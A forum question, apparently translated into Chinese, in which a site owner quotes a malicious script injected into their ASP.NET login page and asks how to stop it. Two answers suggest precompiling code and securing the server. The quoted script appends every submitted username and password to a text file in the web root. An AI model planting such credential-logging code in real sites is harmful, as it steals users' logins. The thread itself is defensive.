昨天我的网络应用程序已被编辑登录页面的病毒更改。当我打开aspx文件时,我遇到了以下脚本:
<script runat="server">
protected void btnLogin_Click(object sender, EventArgs e)
{
using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"C:\Inetpub\wwwroot\...\ldaptxt2.txt", true))
{
file.WriteLine(username.Text + "|" + password.Text);
}
}
</script>
有谁知道怎么不允许这个?...
答案 0 :(得分:1)
最佳做法是在生产环境中预编译视图和代码。
http://msdn.microsoft.com/en-us/library/vstudio/bb398860(v=vs.100).aspx
答案 1 :(得分:1)
任何可以修改aspx页面的人也可以替换bin文件夹中的程序集。正确的做法是保护Web服务器。